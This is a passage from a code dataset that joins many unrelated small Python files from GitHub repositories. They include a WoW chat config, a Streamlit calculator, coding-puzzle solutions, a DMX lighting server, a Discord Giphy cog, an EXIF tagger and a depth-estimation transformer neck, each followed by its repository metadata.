f'host = {self.logon_info.address.host}\\n\\t'\n f'port = {self.logon_info.address.port}\\n\\t'\n f'realm = {self.logon_info.address.name}')\n\n @staticmethod\n def get_logon_info(xml_obj):\n logon_info = LogonInfo()\n logon_info.account = os.environ.get('WOW_ACC').upper()\n logon_info.password = os.environ.get('WOW_PASS').upper()\n logon_info.address.name = os.environ.get('WOW_REALM')\n 
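# WOW_LOGON holds the logon server address; parse() fills the host/port fields reported in the debug output above\n        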
logon_info.address.parse(os.environ.get('WOW_LOGON'))\n        logon_info.version = str(xml_obj.wow.version)\n        logon_info.platform = str(xml_obj.wow.platform)\n        logon_info.locale = str(xml_obj.wow.locale)\n        return logon_info\n\n    @staticmethod\n    def get_logger(logger_cfg):\n        logger = logging.getLogger(str(logger_cfg.name) if logger_cfg.name else 'app')\n        try:\n            log_level = getattr(logging, str(logger_cfg.level).upper())\n            logger.setLevel(log_level)\n        except (ValueError, AttributeError):\n            logger.setLevel(logging.DEBUG)\n        handlers = []\n        if logger_cfg.to_file:\n            now = datetime.datetime.now()\n            filename = f'PyWowChat_{now.date()}_{now.time().hour}-{now.time().minute}-{now.time().second}.log'\n            path = os.path.join(os.path.dirname(sys.argv[0]), 'logs', filename)\n            handlers.append(logging.FileHandler(path))\n        if logger_cfg.to_stdout:\n            handlers.append(logging.StreamHandler(sys.stdout))\n        log_format = str(logger_cfg.format)\n        for handler in handlers:\n            handler.setFormatter(logging.Formatter(log_format))\n            logger.addHandler(handler)\n        return logger\n\n    def reset(self):\n        self.character = Character(name=os.environ.get('WOW_CHAR'))\n        self.guild = Guild()\n        self.players = {}\n        self.calendar = Calendar()\n        self.realm = None\n        self.crypt = GameHeaderCrypt()\n\n\nglob = Globals()\n","repo_name":"Anarom/PyWowChat","sub_path":"src/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42330029118","text":"import streamlit as st\r\nimport numpy as np\r\n\r\n# Define the calculator function\r\ndef calculate(a, b, op):\r\n    if op == \"+\":\r\n        return a + b\r\n    elif op == \"-\":\r\n        return a - b\r\n    elif op == \"*\":\r\n        return a * b\r\n    elif op == \"/\":\r\n        if b == 0:\r\n            raise ZeroDivisionError(\"Cannot divide by zero\")\r\n        return a / b\r\n    else:\r\n        raise ValueError(\"Invalid operator\")\r\n\r\n# Define the Streamlit app\r\nst.title(\"Calculator\")\r\n\r\n# Get user input\r\na = st.number_input(\"First number\")\r\nb = st.number_input(\"Second number\")\r\nop = st.selectbox(\"Operator\", [\"+\", \"-\", \"*\", \"/\"])\r\n\r\n# Calculate the result\r\ntry:\r\n    result = calculate(a, b, op)\r\nexcept ZeroDivisionError as e:\r\n    st.error(e)\r\nelse:\r\n    st.write(\"Result:\", result)\r\n\r\n# Add more operations\r\nst.markdown(\"Additional operations:\")\r\n\r\n# Square root\r\nsqrt = np.sqrt(a)\r\nst.write(\"Square root of {}: {}\".format(a, sqrt))\r\n\r\n# Logarithm\r\nlog = np.log(a)\r\nst.write(\"Logarithm of {}: {}\".format(a, log))\r\n\r\n# Exponential\r\nexp = np.exp(a)\r\nst.write(\"Exponential of {}: {}\".format(a, exp))\r\n","repo_name":"aniruddhasalve/simple-streamlit-calculator-demo","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6873844058","text":"from collections import defaultdict\n\nclass Solution:\n    def isIsomorphic(self, s: str, t: str) -> bool:\n        dic = defaultdict(str)\n        visited = []\n\n        for a, b in zip(s, t):\n            if dic[a] == '':\n                if b in visited:\n                    return False\n                dic[a] = b\n                visited.append(b)\n                continue\n            elif dic[a] == b:\n                continue\n            return False\n        \n        return 
True\n","repo_name":"headF1rst/leetcode-daily-brain-exercise","sub_path":"0205-isomorphic-strings/0205-isomorphic-strings.py","file_name":"0205-isomorphic-strings.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42041233405","text":"import random\nglobal x,y\nalpha = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\"]\nx = 10\ny = 2\n\ndef main():\n print(\"対象文字\")\n for i in range(10):\n x.append(alpha[random.sample(alpha,25)])\n print(x)\n print(\"表示文字\")\n for j in range(8):\n y.append(x[random.randint(0,9)])\n print(y)","repo_name":"c0a21148/ProjExd","sub_path":"Ex01/alphabet.py","file_name":"alphabet.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30235907474","text":"\n# https://leetcode.com/problems/palindrome-number/description/\n\ndef palindrome(s):\n news = str(s)\n print(news, news[::-1])\n return news == news[::-1]\n\n\n# https://leetcode.com/problems/palindrome-linked-list/description/\nclass Node:\n def __init__(self, x, next = None):\n self.x = x\n self.next = next\n\nclass Solution:\n def isPalindrome(self, head):\n if not head or head.next is None:\n return True\n temp = []\n is_palindrome = False\n\n while head != None:\n temp.append(head.x)\n head = head.next\n \n if temp == temp[::-1]:\n is_palindrome = True\n return is_palindrome\n\n\nif __name__ == '__main__':\n print('PALINDROME')\n s = -121\n print(palindrome(s))\n print()\n \n print('NODE')\n head = Node(1, Node(2, Node(2, Node(1))))\n s = Solution()\n print(s.isPalindrome(head))\n\n\n\n\n\n\n \n","repo_name":"goldensky/Tasks-Python-","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69938381229","text":"import socketio\nimport eventlet\nimport eventlet.wsgi\nfrom flask import Flask\nimport SWHear\nimport numpy\n\nfrom pyenttec import DMXConnection\nsio = socketio.Server()\napp = Flask(__name__)\n\near = SWHear.SWHear(rate=44100,updatesPerSecond=20)\near.stream_start()\n\nd = DMXConnection(u'/dev/tty.usbserial-6A2I3O5P')\n\nclass DMXFrame(object):\n def __init__(self, dmx, ear):\n self.dmx = dmx\n self.ear = ear\n\n def render(self):\n self.dmx.render()\n\n def blackout(self):\n self.dmx.blackout()\n\n #BOBBY PAR\n # 1 func, 2 255 (rgbw), 3 spd, 4 main, 5-8 rgbw\n def set_pixel_a(self, dmx_id, red, green, blue, white):\n self.dmx.dmx_frame[dmx_id+0] = int(numpy.average(self.ear.fft) % 255)\n self.dmx.dmx_frame[dmx_id+2] = 255\n self.dmx.dmx_frame[dmx_id+3] = red\n self.dmx.dmx_frame[dmx_id+4] = green\n self.dmx.dmx_frame[dmx_id+5] = blue\n self.dmx.dmx_frame[dmx_id+6] = white\n\n #CLAY PAR\n # :dimmer, :strobe, :control, :speed, :red, :green, :blue, :white\n def set_pixel_b(self, dmx_id, red, green, blue, white):\n if dmx_id != 0:\n dmx_id = dmx_id - 1\n self.dmx.dmx_frame[dmx_id] = int(numpy.average(self.ear.fft) % 255)\n self.dmx.dmx_frame[dmx_id+1] = 0\n self.dmx.dmx_frame[dmx_id+2] = 0\n self.dmx.dmx_frame[dmx_id+3] = 0\n self.dmx.dmx_frame[dmx_id+4] = red\n self.dmx.dmx_frame[dmx_id+5] = green\n self.dmx.dmx_frame[dmx_id+6] = blue\n self.dmx.dmx_frame[dmx_id+7] = white\n\n #SET BARS\n #1-3 RGB, 4-6, RGB, 7-9 RGB 10 master\n def 
set_pixel_bar_a(self,dmx_id, red, green, blue, amber):\n self.dmx.dmx_frame[dmx_id] = red\n self.dmx.dmx_frame[dmx_id+1] = green\n self.dmx.dmx_frame[dmx_id+2] = blue\n self.dmx.dmx_frame[dmx_id+3] = amber\n self.dmx.dmx_frame[dmx_id+9] = int(numpy.average(self.ear.fft) % 255) \n\n def set_pixel_bar_b(self,dmx_id, red, green, blue, amber):\n self.dmx.dmx_frame[dmx_id+4] = red\n self.dmx.dmx_frame[dmx_id+5] = green\n self.dmx.dmx_frame[dmx_id+6] = blue\n self.dmx.dmx_frame[dmx_id+7] = amber \n self.dmx.dmx_frame[dmx_id+9] = int(numpy.average(self.ear.fft) % 255) \n\ndef send_pixel(data):\n f = DMXFrame(dmx=d, ear=ear)\n\n for num, rgb_tuple in enumerate(data):\n dmx_id = num * 10\n\n #print(\"setting pixel: {} {}\".format(dmx_id, rgb_tuple))\n \n if num < 4:\n f.set_pixel_b(dmx_id,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n if num > 3 and num < 8:\n f.set_pixel_a(dmx_id,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n if num == 8:\n f.set_pixel_bar_a(199,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2],100)\n f.set_pixel_bar_b(199,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2],100)\n if num == 9:\n f.set_pixel_bar_a(249,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2],100)\n f.set_pixel_bar_b(249,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2],100)\n\n #f.set_pixel_b(dmx_id,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n # f.set_pixel_a(40,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n # f.set_pixel_a(50,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n # f.set_pixel_a(60,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n # f.set_pixel_a(70,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n f.render()\n # port.dmx_frame[42] = 255 # strobe in combo with ch1\n # port.dmx_frame[43] = rgb_tuple[0]\n # port.dmx_frame[44] = rgb_tuple[1]\n # port.dmx_frame[45] = rgb_tuple[2]\n # port.dmx_frame[46] = 0 #rgb_tuple[2]\n #port.render()\n\n@sio.on('connect', namespace='/chat')\ndef connect(sid, environ):\n print(\"connect \", sid)\n\n@sio.on('chat message', namespace='/chat')\ndef message(sid, data):\n #print(\"message \", data)\n send_pixel(data)\n\n@sio.on('disconnect', namespace='/chat')\ndef disconnect(sid):\n print('disconnect ', sid)\n\nif __name__ == '__main__':\n # wrap Flask application with engineio's middleware\n app = socketio.Middleware(sio, app)\n\n # deploy as an eventlet WSGI server\n eventlet.wsgi.server(eventlet.listen(('', 9000)), app)\n","repo_name":"Iteratix/pixels","sub_path":"flask_server_par.py","file_name":"flask_server_par.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13604928676","text":"\"\"\"\nSophisticated training noise.\n\"\"\"\n\nfrom vocabulary import wordmap\n\nfrom common.myrandom import build\nimport sys\n\n_indexed_weights = None\ndef indexed_weights():\n import common.hyperparameters, common.options\n HYPERPARAMETERS = common.hyperparameters.read(\"language-model\")\n global _indexed_weights\n if _indexed_weights is not None:\n return _indexed_weights\n print >> sys.stderr, wordmap.len, \"=?=\", HYPERPARAMETERS[\"MONOLINGUAL_VOCABULARY_SIZE\"]\n assert wordmap.len == HYPERPARAMETERS[\"MONOLINGUAL_VOCABULARY_SIZE\"]\n if HYPERPARAMETERS[\"NGRAM_FOR_TRAINING_NOISE\"] == 0:\n _indexed_weights = [1 for id in range(wordmap.len)]\n elif HYPERPARAMETERS[\"NGRAM_FOR_TRAINING_NOISE\"] == 1:\n from common.json import load\n from common.file import myopen\n ngrams_file = HYPERPARAMETERS[\"NGRAMS\"][(HYPERPARAMETERS[\"NGRAM_FOR_TRAINING_NOISE\"], HYPERPARAMETERS[\"MONOLINGUAL_VOCABULARY_SIZE\"])]\n print >> sys.stderr, \"Reading 
ngrams from\", ngrams_file, \"...\"\n from collections import defaultdict\n ngramcnt = defaultdict(int)\n for (ngram, cnt) in load(myopen(ngrams_file)):\n assert len(ngram) == 1\n ngramcnt[ngram[0]] = cnt + HYPERPARAMETERS[\"TRAINING_NOISE_SMOOTHING_ADDITION\"]\n _indexed_weights = [ngramcnt[wordmap.str(id)] for id in range(wordmap.len)]\n _indexed_weights = build(_indexed_weights)\n else: assert 0\n return _indexed_weights\n","repo_name":"turian/neural-language-model","sub_path":"scripts/monolingual/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"37"} +{"seq_id":"18145264167","text":"from flask import Flask\nfrom flask_cors import CORS\n\nfrom api.finetuning import FineTuningSubmit, FineTuningStart\nfrom api.measurements import MeasurementsApi\nimport yaml\n\nfrom extensions import api\n\ndef create_app():\n print(\"Initializing app\")\n with open(\"resources/config.yaml\", \"r\") as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n app = Flask(__name__)\n CORS(app)\n api.add_resource(MeasurementsApi, '/measurements')\n api.add_resource(FineTuningSubmit, '/tuning/submit')\n api.add_resource(FineTuningStart, '/tuning/start')\n api.init_app(app)\n return app\n\nif __name__ == '__main__':\n app = create_app()\n app.run(debug=True, port=5000, host='0.0.0.0')\n","repo_name":"petros94/activity-recognition-app","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21624458899","text":"#!/usr/bin/env python3\n\n\"\"\"\nhttps://adventofcode.com/2022/day/6\n\nUsage: cat advent06.input | python3 ./advent06.py\n\n\"\"\"\n\nSTART_OF_PACKET_MARKER_LENGTH = 4\nSTART_OF_MESSAGE_MARKER_LENGTH = 14\n\nimport sys\n\ndef main ():\n input = sys.stdin.read().strip()\n print (find_uniq_marker(START_OF_PACKET_MARKER_LENGTH, input))\n print (find_uniq_marker(START_OF_MESSAGE_MARKER_LENGTH, input))\n\ndef find_uniq_marker (length, input):\n for n in range(len(input) - length):\n if len(set(input[n:n+length])) == length:\n return n+length\n\nif __name__ == '__main__':\n main()\n","repo_name":"rolmo/adventofcode","sub_path":"advent06.py","file_name":"advent06.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"92924242","text":"import math\n\nimport pyautogui\n\nimport osrs.server as server\n\n\ndef find_closest_npc(npcs, ignore=-1):\n closest = {\n \"dist\": 999,\n \"x\": None,\n \"y\": None,\n \"id\": None\n }\n for npc in npcs:\n if npc['id'] != ignore and npc[\"dist\"] < closest[\"dist\"]:\n closest = npc\n return closest\n\n\ndef select_chat_option(chat_options, phrase):\n if not chat_options:\n return -1\n for i, option in enumerate(chat_options):\n if phrase in option:\n return i\n return -1\n\n\ndef generate_game_tiles_in_coords(x_min, x_max, y_min, y_max, z, port='56799'):\n tiles = []\n for x in range(x_min, x_max + 1):\n for y in range(y_min, y_max + 1):\n tiles.append('{},{},{}'.format(x, y, z))\n return tiles\n\n\ndef generate_surrounding_tiles(dist, port='56799'):\n player_loc = server.get_world_location(port)\n tiles = []\n for x in range(player_loc['x'] - dist, player_loc['x'] + dist):\n for y in range(player_loc['y'] - dist, player_loc['y'] + dist):\n tiles.append('{},{},{}'.format(x, y, player_loc['z']))\n return tiles\n\n\ndef 
find_closest_target(targs):\n closest = {\n \"dist\": 999,\n \"x\": None,\n \"y\": None,\n \"id\": None\n }\n for targ in targs:\n if int(targ[\"dist\"]) < int(closest[\"dist\"]):\n closest = targ\n return closest\n\n\ndef find_an_npc(npcs, min_dist):\n closest = {\n \"dist\": 999,\n \"x\": None,\n \"y\": None,\n \"id\": None\n }\n for npc in npcs:\n if closest[\"dist\"] > npc[\"dist\"] >= min_dist:\n closest = {\n \"dist\": npc[\"dist\"],\n \"x\": math.floor(npc[\"x\"]),\n \"y\": math.floor(npc[\"y\"]),\n \"id\": npc[\"id\"]\n }\n if closest['x'] is None:\n return False\n else:\n return closest\n\n\n'''\n|@@@@@@@@@@@@@@|\n|@@DEPRECATED@@|\nV@@@@@@@@@@@@@@V\n'''\n\n\ndef rough_img_compare(img, confidence, region):\n while True:\n try:\n loc = pyautogui.locateOnScreen(img, confidence=confidence, region=region)\n if loc:\n return loc\n else:\n return False\n except Exception as e:\n print('error calling screenshot, retrying.', e)\n","repo_name":"glandon22/AutoOldSchool","sub_path":"osrs/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38151821585","text":"from stack import Stack\n\nprint(\"\\nLet's play Towers of Hanoi!!\")\n\n#Create the Stacks\nstacks = []\nleft_stack = Stack(\"Left\")\nmiddle_stack = Stack(\"Middle\")\nright_stack = Stack(\"Right\")\nstacks += [left_stack, middle_stack, right_stack]\n\n#Set up the Game\nnum_disks = int(input(\"\\nHow many disks do you want to play with?\\n\"))\n\nwhile num_disks < 3:\n num_disks = int(input(\"Enter a number greater than or equal to 3\\n\"))\n\nfor disk in range(num_disks, 0, -1):\n left_stack.push(disk)\n\nnum_optimal_moves = (2 ** num_disks) - 1\nprint(\"\\nThe fastest you can solve this game is in {0} moves\".format(num_optimal_moves))\n#Get User Input\ndef get_input():\n choices = [stack.get_name()[0] for stack in stacks]\n while True:\n\n for i in range(len(stacks)):\n name = stacks[i].get_name()\n letter = choices[i]\n print(\"Enter {0} for {1}\".format(letter, name))\n user_input = input(\"\")\n\n if user_input in choices:\n for i in range(len(stacks)):\n if user_input == choices[i]:\n return stacks[i]\n#Play the Game\nnum_user_moves = 0\n\nwhile(right_stack.get_size() != num_disks):\n\n print(\"\\n\\n\\n...Current Stacks...\")\n for stack in stacks:\n stack.print_items()\n \n while True:\n print(\"\\nWhich stack do you want to move from?\\n\")\n from_stack = get_input()\n print(\"\\nWhich stack do you want to move to?\\n\")\n to_stack = get_input()\n if from_stack.get_size() == 0:\n print(\"\\n\\nInvalid Move. Try Again\")\n elif to_stack.get_size() == 0 or from_stack.peek() < to_stack.peek():\n disk = from_stack.pop()\n to_stack.push(disk)\n num_user_moves += 1\n break\n else:\n print(\"\\n\\nInvalid Move. 
Try Again\")\n\n\nprint(\"\\n\\nYou completed the game in {0} moves, and the optimal number of moves is {1}\".format(num_user_moves, num_optmial_moves))\n","repo_name":"Yelowes/Towers-of-Hanoi","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22150851549","text":"import random\r\nimport urllib.request\r\nimport requests\r\nimport os\r\nimport json\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\nimp = 'Json/'\r\nif os.path.exists(imp + 'BotSettings.json'):\r\n\twith open(imp + 'BotSettings.json') as t:\r\n\t\tt = json.load(t)\r\n\t\tGIPHY_API = t['GIPHY']\r\n\r\nclass Giphy(commands.Cog):\r\n\tdef __init__(self, bot, settings):\r\n\t\tself.bot = bot\r\n\t\tself.settings = settings\r\n\r\n\t@commands.command()\r\n\tasync def gif(self, ctx, *, giphy:str=None):\r\n\t\t\"\"\"\r\n\t\t[search]\r\n\t\tThis searchs for a giph image\r\n\t\t\"\"\"\r\n\t\t\t\r\n\t\tif not giphy:\r\n\t\t\twith urllib.request.urlopen(f'https://api.giphy.com/v1/gifs/random?api_key={GIPHY_API}&rating=R') as url:\r\n\t\t\t\tdata = json.loads(url.read().decode())\r\n\t\t\t\tdata = data['data']\r\n\t\t\t\tdata = data['embed_url']\r\n\t\telse:\r\n\t\t\tgiphy = giphy.replace(\" \", \"+\")\r\n\t\t\twith urllib.request.urlopen(f\"http://api.giphy.com/v1/gifs/search?q={giphy}&api_key={GIPHY_API}&limit=1&rating=R\") as url:\r\n\t\t\t\tdata = json.loads(url.read().decode())\r\n\t\t\t\tdata = random.choice(data['data'])\r\n\t\t\t\tdata = data['embed_url']\r\n\r\n\t\tif ctx.author.top_role.colour:\r\n\t\t\tcol = ctx.author.top_role.colour\r\n\t\telse:\r\n\t\t\tcol =self.settings.randomColor()\r\n\r\n\t\tembed=discord.Embed(title=f\"Gif\", color=col)\r\n\t\tembed.set_image(url=data)\r\n\t\tawait ctx.send(embed=embed)\r\n\t\t# await ctx.send(data)\r\n\r\ndef setup(bot):\r\n\tsettings = bot.get_cog(\"Settings\")\r\n\tbot.add_cog(Giphy(bot, settings))","repo_name":"ScoobyChan/ScrappyBot","sub_path":"Cogs/Giphy.py","file_name":"Giphy.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20677011373","text":"# Write a function called sumZero which accepts a sorted array of integers. The function should find the first pair where the sum is 0. 
Return an array that includes both values that sum to Zero or undefined if a pair does not exist.\n\n# Ex: [-3, -2, -1, 0, 1, 2, 3, 4, 6, 7] => [-3, 3]\n\n# [-2, 0, 1, 3] => undefined\n\n# [1, 2, 3] => undefined\n\ndef sumZero(array):\n\n i = 0\n j = len(array) - 1\n while i < j:\n if array[i] + array[j] == 0:\n return [array[i], array[j]]\n if array[i] + array[j] > 0:\n j -= 1\n else:\n i += 1\n","repo_name":"jonnynotbravo/DS-Algos","sub_path":"Sum Zero.py","file_name":"Sum Zero.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12462504671","text":"from PIL.ExifTags import TAGS\nfrom PIL import Image\nimport piexif\n\n\nimg_path = 'insta_images/jusep.v_1.jpg'\nimg = Image.open(img_path)\n# info = img._getexif()\n\ntmp = input('Enter a tag: ')\n\nprint(img.info.items())\n# print(tmp)\nif 'exif' not in img.info.keys():\n # XP* tags belong in the 0th IFD and hold UTF-16LE bytes\n tag = {\n piexif.ImageIFD.XPKeywords: tmp.encode('utf-16le')\n }\n exif_dict = {'0th' : tag}\n exif_bytes = piexif.dump(exif_dict)\n piexif.insert(exif_bytes, img_path)\n\nelse:\n exif_dict = piexif.load(img.info['exif'])\n exif_dict['0th'][piexif.ImageIFD.XPKeywords] = tmp.encode('utf-16le')\n exif_bytes = piexif.dump(exif_dict)\n new_file = img_path\n img.save(new_file, 'JPEG', exif=exif_bytes)\n\n# new_img = Image.open(img_path)\n# print(new_img.info.items())\n# print(new_img.info['exif'].decode('utf-8'))","repo_name":"jusepv/software_exercise","sub_path":"software_project/imageTag2.py","file_name":"imageTag2.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17746121811","text":"# Good morning! Here's your coding interview problem for today.\n#\n# This problem was asked by Epic.\n#\n# The \"look and say\" sequence is defined as follows: beginning with the term 1, each subsequent term visually describes the digits appearing in the previous term. 
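In other words, each term is the run-length encoding of the previous term, read as count-then-digit. 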
The first few terms are as follows:\n#\n# 1\n# 11\n# 21\n# 1211\n# 111221\n# As an example, the fourth term is 1211, since the third term consists of one 2 and one 1.\n#\n# Given an integer N, print the Nth term of this sequence.\n\nclass Solution:\n\n def countAndSay(self, n: int) -> str:\n if n == 1:\n return \"1\"\n if n == 2:\n return \"11\"\n\n s = \"11\"\n for i in range(3, n + 1):\n\n # append a dummy end-of-string character so the loop doesn't run out of bounds\n # and the final run of characters is still counted.\n s += \"$\"\n tmp = \"\"\n c = 1\n for j in range(1, len(s)):\n if (s[j] != s[j - 1]):\n tmp += str(c)\n tmp += s[j - 1]\n c = 1\n else:\n c += 1\n s = tmp\n return s\n\n\nmy_new_instance = Solution()\nprint(my_new_instance.countAndSay(30))\n","repo_name":"shubhambakre/DailyCodingProblems","sub_path":"October/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19627610096","text":"import torch.nn as nn\nfrom mmcv.cnn import ConvModule, xavier_init\n \nfrom mmseg.ops import resize\nfrom mmseg.models.builder import DEPTHNECK\n\nimport torch\nimport math\n\nfrom torch.nn.modules.activation import MultiheadAttention\n\nfrom mmdepth.models.necks.ops.modules import MSDeformAttn\nimport copy\n\nfrom torch.nn.init import xavier_uniform_, constant_, uniform_, normal_\nimport torch.nn.functional as F\n\n@DEPTHNECK.register_module()\nclass DepthAffMultiLevelNeck(nn.Module):\n \"\"\"MultiLevelNeck.\n\n A neck structure that connects the ViT backbone and decoder_heads, with DPT-style resemble blocks.\n Args:\n in_channels (List[int]): Number of input channels per scale.\n out_channels (int): Number of output channels (used at each scale).\n scales (List[float]): Scale factors for each input feature map.\n Default: [0.5, 1, 2, 4]\n norm_cfg (dict): Config dict for normalization layer. 
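Passed to every ConvModule this neck builds. 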
Default: None.\n act_cfg (dict): Config dict for activation layer in ConvModule.\n Default: None.\n \"\"\"\n\n def __init__(self,\n in_channels,\n out_channels,\n scales=[0.5, 1, 2, 4],\n norm_cfg=None,\n act_cfg=None,\n embedding_dim=256,\n nhead=8,\n num_encoder_layers=4,\n num_decoder_layers=4,\n dim_feedforward=1024,\n dropout=0.1,\n dec_n_points=4,\n enc_n_points=4):\n\n super(DepthAffMultiLevelNeck, self).__init__()\n assert isinstance(in_channels, list)\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.scales = scales\n self.num_outs = len(scales)\n self.lateral_convs = nn.ModuleList()\n self.convs = nn.ModuleList()\n self.embedding_dim = embedding_dim\n\n # deformable transformer\n self.nhead=nhead\n self.num_encoder_layers=num_encoder_layers\n self.num_decoder_layers=num_decoder_layers\n self.dim_feedforward=dim_feedforward\n self.dropout=dropout\n self.dec_n_points=dec_n_points\n self.enc_n_points=enc_n_points\n\n # basic convs for skip connection\n for in_channel, out_channel in zip(in_channels, out_channels):\n self.lateral_convs.append(\n ConvModule(\n in_channel,\n out_channel,\n kernel_size=1,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg))\n for in_channel, out_channel in zip(out_channels, out_channels):\n self.convs.append(\n ConvModule(\n in_channel,\n out_channel,\n kernel_size=3,\n padding=1,\n stride=1,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg))\n\n\n # channel proj, project all the feats to the same channel for fusion\n self.proj_convs = nn.ModuleList()\n for in_channel, out_channel in zip(in_channels, out_channels):\n self.proj_convs.append(\n ConvModule(\n in_channel,\n embedding_dim,\n kernel_size=1,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg))\n\n self.feat_pos_embed = PositionEmbeddingSine(self.embedding_dim//2)\n self.query_pos_embed = PositionEmbeddingSine(self.embedding_dim//2)\n self.reference_points = nn.Linear(self.embedding_dim, 2)\n\n self.transformer = DeformableTransformer(d_model=self.embedding_dim,\n nhead=self.nhead,\n num_encoder_layers=self.num_encoder_layers,\n num_decoder_layers=self.num_decoder_layers,\n dim_feedforward=self.dim_feedforward,\n dropout=self.dropout,\n activation=\"relu\",\n return_intermediate_dec=True,\n num_feature_levels=len(in_channels) - 1,\n dec_n_points=self.dec_n_points,\n enc_n_points=self.enc_n_points)\n\n self.conv_fusion = ConvModule(\n in_channels[0],\n out_channels[0],\n kernel_size=3,\n padding=1,\n stride=1,\n norm_cfg=norm_cfg,\n act_cfg=act_cfg)\n\n def get_valid_ratio(self, mask):\n _, H, W = mask.shape\n valid_H = torch.sum(~mask[:, :, 0], 1)\n valid_W = torch.sum(~mask[:, 0, :], 1)\n valid_ratio_h = valid_H.float() / H\n valid_ratio_w = valid_W.float() / W\n valid_ratio = torch.stack([valid_ratio_w, valid_ratio_h], -1)\n return valid_ratio\n\n @staticmethod\n def get_reference_points(spatial_shapes, valid_ratios, device):\n reference_points_list = []\n for lvl, (H_, W_) in enumerate(spatial_shapes):\n\n ref_y, ref_x = torch.meshgrid(torch.linspace(0.5, H_ - 0.5, H_, dtype=torch.float32, device=device),\n torch.linspace(0.5, W_ - 0.5, W_, dtype=torch.float32, device=device))\n ref_y = ref_y.reshape(-1)[None] / (valid_ratios[:, None, lvl, 1] * H_)\n ref_x = ref_x.reshape(-1)[None] / (valid_ratios[:, None, lvl, 0] * W_)\n ref = torch.stack((ref_x, ref_y), -1)\n reference_points_list.append(ref)\n reference_points = torch.cat(reference_points_list, 1)\n reference_points = reference_points[:, :, None] * valid_ratios[:, None]\n return reference_points\n\n def forward(self, src, spatial_shapes, 
level_start_index, valid_ratios, pos=None, padding_mask=None):\n output = src\n reference_points = self.get_reference_points(spatial_shapes, valid_ratios, device=src.device)\n for _, layer in enumerate(self.layers):\n output = layer(output, pos, reference_points, spatial_shapes, level_start_index, padding_mask)\n\n return output\n\n # default init_weights for conv(msra) and norm in ConvModule\n def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m, distribution='uniform')\n\n def forward(self, inputs):\n assert len(inputs) == len(self.in_channels)\n\n inputs = [\n lateral_conv(inputs[i])\n for i, lateral_conv in enumerate(self.lateral_convs)\n ]\n # for len(inputs) not equal to self.num_outs\n if len(inputs) == 1:\n inputs = [inputs[0] for _ in range(self.num_outs)]\n outs = []\n for i in range(self.num_outs):\n x_resize = resize(\n inputs[i], scale_factor=self.scales[i], mode='bilinear')\n outs.append(self.convs[i](x_resize))\n\n\n # here, List[outs] saves the skip transformer feats\n masks = []\n srcs = []\n poses = []\n query_feat = None\n for i in range(len(outs)):\n if i == len(outs) - 1:\n query_feat = self.proj_convs[i](outs[i])\n _bs, _c, _h, _w = query_feat.shape\n else:\n mask = torch.zeros_like(outs[i][:, 0, :, :]).type(torch.bool)\n masks.append(mask)\n pos = self.feat_pos_embed(outs[i], mask)\n poses.append(pos)\n feat = self.proj_convs[i](outs[i])\n srcs.append(feat)\n 